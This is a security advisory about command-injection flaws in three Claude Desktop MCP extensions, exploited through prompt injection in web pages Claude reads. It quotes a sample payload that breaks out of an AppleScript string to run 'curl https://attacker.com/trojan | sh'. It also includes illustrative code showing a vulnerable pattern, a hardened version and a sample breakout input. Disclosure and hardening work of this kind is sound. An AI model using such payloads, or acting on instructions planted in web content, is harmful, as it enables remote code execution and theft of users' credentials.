Command injection vulnerabilities reported in Claude Desktop extensions enabling Remote Code Execution
Take action: If you use Claude Desktop with the Chrome, iMessage, or Apple Notes extensions, update all of them immediately to version 0.1.9 or later; earlier versions can be made to execute malicious code that attackers hide in websites Claude browses. In general, avoid using AI agents and local tools: they are not properly secured, there is too much rush to deploy new things instead of securing them, and attackers can simply plant a malicious prompt injection on their websites and wait.
Learn More
Koi Security is reporting remote code execution vulnerabilities in three official Claude Desktop extensions that could have enabled attackers to execute arbitrary code on users' machines through AI interactions.
The vulnerabilities affect the Chrome, iMessage, and Apple Notes connectors. Koi Security dubbed them collectively "PromptJacking" and assigned them a high severity rating (CVSS score 8.9). The Claude Desktop extensions are packaged MCP servers distributed as .mcpb bundles, essentially compressed archives containing server code and function manifests. Unlike browser extensions, which run in sandboxed environments, these extensions operate fully unsandboxed on users' machines with complete system permissions, enabling them to read any file, execute any command, access stored credentials, and modify system settings.
These vulnerabilities are caused by command injection in the Model Context Protocol (MCP) servers that power the extensions: each affected extension took user-provided input and passed it directly into AppleScript commands without sanitization or escaping, allowing injected commands to execute shell operations with full system privileges.
Affected Extensions:
- Chrome connector for Claude Desktop (versions prior to 0.1.9)
- iMessage connector for Claude Desktop (versions prior to 0.1.9)
- Apple Notes connector for Claude Desktop (versions prior to 0.1.9)
The exploitation mechanism uses prompt injection through web content. When users query Claude, the AI assistant routinely fetches and analyzes web pages to answer questions, creating an attack vector. An attacker controlling a search result page or compromising a legitimate website could detect Claude's user agent and serve tailored malicious content.
For example, when Claude received a command to open a URL in Chrome, the vulnerable extension would construct an AppleScript string using template literals, directly interpolating the user-provided URL into commands without validation. A maliciously crafted URL containing the payload "& do shell script "curl https://attacker.com/trojan | sh"&" would break out of the string context and inject arbitrary AppleScript commands, triggering shell command execution with full privileges.
In a practical attack scenario, a user asking Claude a simple question such as "Where can I play paddle in Brooklyn?" could trigger the vulnerability if one of the search results pointed to an attacker-controlled page. The attacker's server would detect Claude's user agent and serve a hidden payload, causing Claude to execute injected commands through the vulnerable extension.
The malicious code could then steal SSH keys, exfiltrate AWS credentials, capture browser passwords and session tokens, upload local code repositories, install persistent backdoors, or log keystrokes—all without the user noticing anything unusual.
Anthropic patched these flaws in version 0.1.9 of the affected extensions, which implements proper string escaping before executing AppleScript commands.
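To make the injection pattern described above and the escaping fix concrete, here is an added illustration in the style of a Node-based MCP server; it is not the extension's own code, and the function names, the URL-scheme allowlist and the `textOutsideUrlLiteral` checker are hypothetical:

```javascript
// VULNERABLE pattern: the URL is interpolated straight into an AppleScript
// string literal. A double quote in the input closes the literal and whatever
// follows is parsed as AppleScript, not as part of the URL.
function buildOpenUrlScriptVulnerable(url) {
  return `tell application "Google Chrome" to open location "${url}"`;
}

// AppleScript string literals are delimited by double quotes and use
// backslash escapes, so both characters must be escaped before interpolation.
function escapeAppleScriptString(s) {
  return s.replace(/\\/g, "\\\\").replace(/"/g, '\\"');
}

// HARDENED pattern: parse the input as a URL, allow only http(s) (assumed
// policy for a "open in browser" tool), then escape the normalized href so it
// cannot terminate the literal. Anything else is rejected, not forwarded.
function buildOpenUrlScriptHardened(input) {
  let parsed;
  try {
    parsed = new URL(input);
  } catch {
    throw new Error("rejected: not a valid URL");
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
    throw new Error(`rejected: scheme ${parsed.protocol} not allowed`);
  }
  const safe = escapeAppleScriptString(parsed.href);
  return `tell application "Google Chrome" to open location "${safe}"`;
}

// Review helper: returns the AppleScript text that ends up OUTSIDE the string
// literal meant to hold the URL. An empty result means the input stayed
// contained; anything else is code the caller never intended to run.
function textOutsideUrlLiteral(script) {
  const marker = 'open location "';
  const start = script.indexOf(marker);
  if (start < 0) throw new Error("unexpected script shape");
  let i = start + marker.length;
  while (i < script.length) {
    if (script[i] === "\\") { i += 2; continue; } // skip escaped character
    if (script[i] === '"') return script.slice(i + 1).trim();
    i++;
  }
  throw new Error("unterminated string literal");
}

// Constructed sample input: a URL whose path tries to break out of the literal.
const SAMPLE_PAYLOAD = 'https://example.test/" & (do shell script "id") & "';
```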
These were official Anthropic extensions distributed, promoted, and trusted as part of the core Claude Desktop experience, which raises significant concerns about security practices in the Model Context Protocol ecosystem. As the MCP marketplace expands with contributions from independent developers, the combination of full local access, rapid iteration, and minimal oversight creates serious risk to users.